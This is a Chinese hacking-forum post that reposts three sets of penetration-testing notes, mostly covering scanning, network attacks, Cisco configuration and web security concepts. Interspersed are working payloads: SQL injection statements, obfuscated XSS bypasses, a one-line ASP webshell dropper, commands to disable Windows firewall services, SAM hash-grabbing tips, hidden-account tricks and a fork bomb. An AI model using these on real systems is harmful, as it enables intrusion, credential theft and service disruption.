查看: 12166|回复: 1

[教程专区] 【转】 渗透笔记三则。

[复制链接]

该用户从未签到

发表于 2013-11-28 21:43:14 | 显示全部楼层 |阅读模式
                                                                               【渗透笔记】(壹)  

                  1、避免0day攻击的最好办法是实现启发式(Heuristic)或基于轮廓(Profile-based)的入侵检测系统。

2、常见的安全证书包括CCIE: Security、CEH、CISSP、CCSP、GIAC、OPSTA和Security+。

3、Nmap扫描主机开放端口,能够在运行IPSec的OpenBSD 2.7 系统上引发DOS攻击。当使用-sO选项运行Nmap时,就会引起OpenBSD系统奔溃。
4、现在已知端口扫描能够在下述环境中引发DOS攻击:Efficient Networks Routers、pcAnywhere9.0、安装了Novell intraNetWare Client的Windows 95/98。
5、湿件(Wetware),湿件就是计算机中人类的因素。
6、被动侦查:用户组会议、Web网站上的信息、Edgars数据库、社工库、UUNet新闻组、商业伙伴、垃圾搜索、社会工程学;
主动侦查:端口扫描、DNS查询、区域传输、ping扫描、路由跟踪、OS特征检测
7、端口扫描的几种类型:TCP Connect()扫描、SYN扫描、NULL扫描、FIN扫描、ACK扫描、Xmas-Tree扫描、Dumb扫描、Reverse Ident扫描
8、灰箱测试(Gray-Box):测试人员模拟内部雇员。他们得到了一个内部网络的账号,并且拥有了访问网络的标准方法。这项测试用于评估来自企业内部职员的攻击。
9、在netcat中,经常使用53端口监听的原因是:这个端口号是分配跟DNS使用的,通常防火墙开放这个端口。如果选择其他不常用的端口,那么防火墙可能会阻断这些端口的流量。
10、盲注的核心语句:
1
php?id=1 and (select ord(mid(group_concat(SCHEMA_NAME),20,1)) from information_schema.schemata)>0
11、VLAN 跳跃攻击利用了DTP。在VLAN跳跃中,将我们的计算机伪装为另一个交换机。我们发送一条伪造的DTP协商消息,声明我们希望进行帧中继。当真实交换机接到我们的DTP消息之后,它就会认为它应该转到802.1Q中继。当转入中继状态之后,发自所有VLAN的所有流量都发送到你的计算机上。
12、VTP攻击:在被攻击网络上连接一台交换机,然后在新增交换机和黑客的计算机之间建立中继连接。之后,恶意黑客向交换机发送一条VTP消息,该消息的配置修订号大于当前VTP服务器上的配置修订号,但不配置VLAN。这样,所有的交换机都与恶意黑客的计算机进行同步,从而在他们的VLAN数据库中删除所有非默认的VLAN(当然,你要撞对VTP password。)
13、 在ACK扫描中,TCP数据包被发送到每一个端口,数据包设置了ACK位。防火墙通常会对未过滤的端口作出响应,他的响应是一个设置了RST位的TCP数据包。绝大多数的防火墙对过滤掉的端口不作出响应。通过记录从防火墙返回的RST数据包,我们就可以评估运行在防火墙后面网络中的服务是什么服务。
14、如果防火墙开放ICMP端口(可ping、traceroute),可以利用Loki ICMP隧道技术来穿透,这种类型的隧道技术让我们能够在ICMP Echo数据包的数据部分承载一个后门应用。
15、ICMP隧道、ACK隧道和HTTP隧道穿透技术是三种穿越防火墙而不被检测到的技术。
16、规避基于特征类型的IDS,常用的两种方法是:加密和利用转换(Exploit Mutation)。其中加密通信我们可以利用NetCat的一个加密版本NCrypt来实现。
17、恶意黑客通过向路由器发送大量的CDP帧,能够摧毁或重启运行版本早于12.2(3)的Cisco IOS Software的路由器。要发送多个CDP帧,可以利用基于Linux的CDP Sender工具。
18、思科路由器的两种使能模式加密命令:enable password 【密码】  和  enable secret 【密码】,区别在于:在第一种加密中,口令以明文的形式存储在配置中。通过在全局配置提示符下输入命令service password-encryption,可以使用类型7加密方式加密口令。在第二种加密中,口令使用类型5加密方法进行加密。
19、Boson RIP Route Generator 可以模拟网络上的路由器,并让我们能够注入伪造网络和配置的跳计数,以实现路由器注入技术(可以实现路由欺骗技术)。





==========================================================================================================



                                                                                                    【渗透笔记】(贰)



                                                                         1、两种越权操作类型:横向越权操作和纵向越权操作。前者指的是攻击者尝试访问与他拥有相同权限的用户的资源;而后者指的是一个低级别攻击者尝试访问高级别用户的资源。
2、
黑盒测试
fuzzing
模糊测试
权限攻击
流程攻击

灰盒测试
对关键部分代码进行审计
协议的加密解密
关键数据的解密

白盒测试
自动化工具审计
代码走读,发现深层次漏洞
3、在msfconsole中,可以使用setg命令和unsetg命令,用于在msfconsole中设置全局性的参数值,从而减少相同值的输入情况
4、在msfconsole中利用nmap扫描,可以通过添加–script=smb-check-vulns脚本,来自动识别主机存在的漏洞
例如:msf > nmap -sT -A –script=smb-check-vulns -PO  xxx.xxx.xxx.xxx
5、所谓“学”,是指学院式的各种网络安全理论研究,而“术”则是指实用性的技术、方法与手段。其中,“术”的最直接体现,就是各种黑客入侵攻击技术。在许多学院派的安全研究者和工作人员的眼中,往往厚“学”而薄“术”,甚至瞧不起”术”,对各种入侵行为和入侵技术持不屑的态度。
       学院派的网络安全研究者们往往对网络安全的整体规划、网络协议原理及分布、入侵检测设备、防火墙等津津乐道,而把各种黑客攻击技术视作旁门左道,认为所谓的黑客攻击只不过是利用已有的漏洞或现成的工具,是表面的、是粗浅的,即使对网络和系统原理有所了解,也是极为局部的。然而事实确实,许多对网络原理一窍不通,甚至只会利用工具的“脚本小子”或“工具黑客”,令学院派的高材生们防不胜防,使网络遭受入侵攻击。
                                                                    ——摘自《大中型网络入侵要案》.肖遥.“学”与“术”之辨
6、Xss绕绕绕:
1
<scRipT>
Fei1J3i4=//#$d#$%#$% 4645767 $#^3$ @$@SF ae&*
unescape //#$dgG RTDSF ae&*DFYR56456 456RT4 564 4 #$%#$^!~
("%61%6C%65%72%74%28%22%u6211%u7231%u80A5%u9E21%22%29");
eval( Fei1J3i4 )//#$#$%#$%3@v%%!!@G f fgretr&*345$#^#$^
</sCrIPt>


7、网页框架低级隐藏:

1
<iframe src=http://www.baidu.com width=0 height=0 frameborder=0></iframe>


8、网页木马的原理通常是利用各种系统或应用软件的溢出漏洞造成溢出攻击,并自动执行木马程序。系统漏洞类:内置IE浏览器漏洞网马、各种系统组件漏洞网马。软件漏洞型:播放器漏洞网马、第三方浏览器插件网马、Office漏洞网马、其他应用软件网马。

9、采用Kerberos系统进行认证时,可以在报文中加入时间戳来防止重放攻击。用户首先向认证服务器AS申请初始票据,然后从票据授予服务器TGS获得回话密钥。
10、多形病毒指的是每次感染都会改变自己的计算机病毒,又叫幽灵病毒。一个不被扫描病毒检测程序发现的方法就是使用可变的加密钥匙进行自我加密。
11、为了保护我们的账号,我们可以在交换机上启用AAA认证来保证我们的设备安全,AAA认证分为authentication、authorization、accounting,只简单介绍一下authentication认证的配置:
1
S1(config)#aaa new-model     //启动AAA认证机制
2
S1(config)#aaa authentication login name group tacas+ radius    //此认证的名字是name,认证方法是tacas+、radius
3
S1(config-line)#line vty 0 4
4
S1(config-line)login authentication name  //在vty接口应用AAA认证
大体的意思是,交换机启用了一个名子为name的认证,name定义了两个认证方法tacas+、radius,当交换机收到客户用户名和密码时,将此信息发到tacas+服务器上认证。当tacas+失效时启用radius,radius也是一种认证服务器。然后在vty也就是telnet端口上应用这个认证。
12、LSB算法:
1 将得到的隐藏有秘密信息的十进制像素值转换为二进制数据;
2 用二进制秘密信息中的每一比特信息替换与之相对应的载体数据的最低有效位;
3 将得到的含秘密信息的二进制数据转换为十进制像素值,从而获得含秘密信息的图像。
13、网络设备用SSH来访问,所能防范的网络攻击有:数据包欺骗、IP或者主机欺骗、口令截获、网络嗅探、插入攻击。
14、插入攻击:这种攻击可以在客户和服务器之间发送的正文数据流之间插入任意数据。SSH1.2.25后和OPENSSH的所有版本都专门进行了设计,来检测并防止这种攻击。这种检测程序增大了插入攻击的难度,但是并不能完全防止。SSH2使用强加密完整性检测手段来防止这个问题。可以用3DES算法来防止这种攻击。
15、http作用可以分为两种:一是建立信息安全通道,保证数据传输安全;另一种是确认网站的真实性。
16、注入攻击的本质,是把用户输入的数据当做代码执行。这里有两个关键条件,第一个是用户能够控制输入;第二个是原本程序要执行的代码,拼接了用户输入的数据。
                                           ——摘自《白帽子讲Web安全》吴翰清
17、Timing SQL Attack的本质是,利用BENCHMARK()函数,可以让同一个函数执行若干次,使得结果返回的时间比平时要长;通过时间长短的变化,可以判断注入语句是否执行成功。这是一种边信道攻击。如果页面存在SQL注入漏洞,则会较长时间才返回查询结果。如果页面不存在漏洞,则该语句将会很快执行完。
                                                 ——摘自《白帽子讲Web安全》吴翰清
18、双查询注入核心语句:
1
php?id=-1 union select 1 from (select+count(*),concat(floor(rand(0)*2),( 注入爆数据语句))a from information_schema.tables group by a)b


==============================================================================================
                                                                                               【渗透笔记】(叁)

                                                                1、提权简单归纳一下,可以分为系统设置与第三方软件缺陷提权、溢出提权、社会工程学提权。



2、asp webshell想要执行cmd命令,需要具备一起其中任一个组件:wscript.shell、wscript.shell1、shell applition、shell applition1



3、有时候添加账号没成功可能是服务器的强密码策略(万恶的2008),改个超强度的密码再往死里整吧。



4、有时候能够添加用户,但是不能添加管理员组,这时候考虑是不是管理员组被改名了。可以利用net user administrator查看管理员所属的组来确定名称。



5、添加账号一个小小技巧,妙用无限:在添加账号时,将账号名设为“ ”(引号里的字符为搜狗拼音打v+1时候的d项),不懂什么意思,net user一下你就知道这个淫荡的技巧了。



7、XSS绕绕绕2:
1
search?str=xxxx%3Ca%20href=%22data:text/html;%26%230000000000000000098ase64%26%230000000000000044%20PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22%3Etest%3C/a%3E
缺陷参数:str

过滤规则够BT 但是同样能绕!

会把提交的编码 给解码 然后再插入到网页中!然后再对网页内的值进行检查 过滤!

1
base64 --< %26%230000000000000000098ase64
首先%26%23会被还原成 &#  于是变成了: b 于是被还原成:b
b插入到页面 再检查 b+ase64  = base64 满足规则  于是又过滤成 base64  绕过失败!

但是如果b的html十进制编码 再多加几个000  便不会被他给解码  但是在浏览器中又会被解码 于是便可以这样绕过!

——摘自《XSS神器]XssEncode chrome插件 – 0x_Jin》

8、泪滴攻击是拒绝服务攻击的一种。 泪滴是一个特殊构造的应用程序,通过发送伪造的相互重叠的IP分组数据包,使其难以被接收主机重新组合。他们通常会导致目标主机内核失措 。 泪滴攻击利用IP分组数据包重叠造成TCP/ IP分片重组代码不能恰当处理IP包。影响的系统有Windows 3.1、Windows 95和NT、2.0.32和2.1.63版本以下的Linux。



9、当防火墙被放置在外网边界,一般不会开启IDS功能,外网的攻击比较多,也比较复杂,开启IDS可能导致防火墙的性能出现问题。一般来说,当防火墙处于信息中心边界时,可以开启IDS;而在外网边界可以使用专门的IDS或IPS设备。



10、Nessus是一个强大的扫描器,强大到它甚至拥有属于自己的脚本语言,称为Attack Scripting Language(NASL)。



11、得到目标站目录, 不能直接跨的 。 可以通过” echo ^<%execute(request(“cmd”))%^> >>X:目标目录 X.asp “或者 “copy 脚本文件 X:目标目录X.asp”像目标目录写入 webshell,或者还可以试试 type 命令。



12、在win下关闭防火墙 和 TCP/IP 筛选的命令:net stop policyagent & net stop sharedaccess



13、当  GetHashes  获取不到  hash  时,可以用冰刃(IceSword)把  sam  复制到桌面(适用于Windows 2000/XP/2003/Vista操作系统)。
14、一般来说,中文编码使用big5时,在写入某些数据库系统中,在“许、盖、功”这些字体上面会发生错误。



15、

1
){ :|:& };:
——Linux fork炸弹,其防范的方法是使用命令“ulimit -u 200”来限制每个用户可以使用的最大进程数量。



16、标准ACL ,  所谓标准,就是指依照标准IP协议进行过滤,而且只对数据包的源IP地址进行控制。所以,标准ACL的应用要尽量靠近目的IP。



17、扩展ACL应该靠近特征数据的源地址所在端口,这样可以将被阻止的数据尽快地组织在不需传递它的网络外面。



18、渗透一定意义上是人与人的较量,所以呢,如果你现在月薪5000那么去黑掉一个大家伙的时候应该从月薪2000的地方入手,譬如前台,运营,客服,hr,公关之类的为佳,找程序的入口也应该找实习生开发的,找外包的……      ——by wooyun@xsser






===================================================================================
转自91ri.org
http://www.91ri.org/category/anquan/notes
回复

使用道具 举报

该用户从未签到

 楼主| 发表于 2013-11-28 21:44:23 | 显示全部楼层
希望能对大家有帮助 。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

GMT+8, 2024-11-16 07:00 , Processed in 0.024080 second(s), 12 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部